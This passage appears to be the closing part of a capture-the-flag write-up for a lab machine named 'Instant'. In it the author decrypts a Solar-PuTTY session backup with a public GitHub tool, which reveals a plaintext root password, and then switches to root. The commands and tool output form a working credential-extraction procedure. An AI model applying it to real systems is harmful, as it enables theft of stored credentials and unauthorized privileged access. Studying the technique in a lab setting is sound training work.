Solar-PuTTY Session Decrypt
A saved session key for Solar-PuTTY was identified at /opt/backup/Solar-PuTTY/sessions-backup.dat
Decryptor is available online
PS C:\Users\tacticalgator\source> cd .\repos\
PS C:\Users\tacticalgator\source\repos> git clone https://github.com/VoidSec/SolarPuttyDecrypt
Cloning into 'SolarPuttyDecrypt'...
remote: Enumerating objects: 32, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 32 (delta 0), reused 0 (delta 0), pack-reused 28 (from 1)
Receiving objects: 100% (32/32), 79.79 KiB | 809.00 KiB/s, done.
Resolving deltas: 100% (6/6), done.
PS C:\Users\tacticalgator\source\repos> start .\SolarPuttyDecrypt\SolarPuttyDecrypt.slnDownloading the decryptor and opening it up in Visual Studio
Build complete
PS C:\Users\tacticalgator\source\repos\SolarPuttyDecrypt\SolarPuttyDecrypt\bin\Release> .\SolarPuttyDecrypt.exe sessions-backup.dat estrella
-----------------------------------------------------
SolarPutty's Sessions Decrypter by VoidSec
-----------------------------------------------------
{
"Sessions": [
{
"Id": "066894ee-635c-4578-86d0-d36d4838115b",
"Ip": "10.10.11.37",
"Port": 22,
"ConnectionType": 1,
"SessionName": "Instant",
"Authentication": 0,
"CredentialsID": "452ed919-530e-419b-b721-da76cbe8ed04",
"AuthenticateScript": "00000000-0000-0000-0000-000000000000",
"LastTimeOpen": "0001-01-01T00:00:00",
"OpenCounter": 1,
"SerialLine": null,
"Speed": 0,
"Color": "#FF176998",
"TelnetConnectionWaitSeconds": 1,
"LoggingEnabled": false,
"RemoteDirectory": ""
}
],
"Credentials": [
{
"Id": "452ed919-530e-419b-b721-da76cbe8ed04",
"CredentialsName": "instant-root",
"Username": "root",
"Password": "12**24nzC!r0c%q12",
"PrivateKeyPath": "",
"Passphrase": "",
"PrivateKeyContent": null
}
],
"AuthScript": [],
"Groups": [],
"Tunnels": [],
"LogsFolderDestination": "C:\\ProgramData\\SolarWinds\\Logs\\Solar-PuTTY\\SessionLogs"
}
-----------------------------------------------------
[+] DONE Decrypted file is saved in: C:\Users\tacticalgator\Desktop\SolarPutty_sessions_decrypted.txtDecrypting the saved session hash with the cracked web API password of the shirohige user reveals the credential of the root account; 12**24nzC!r0c%q12
shirohige@instant:/$ su root
Password:
root@instant:/# whoami
root
root@instant:/# hostname
instant
root@instant:/# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:58:54 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.129.210.105/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 2988sec preferred_lft 2988sec
inet6 dead:beef::250:56ff:fe94:5854/64 scope global dynamic mngtmpaddr
valid_lft 86398sec preferred_lft 14398sec
inet6 fe80::250:56ff:fe94:5854/64 scope link
valid_lft forever preferred_lft foreverSystem Level Compromise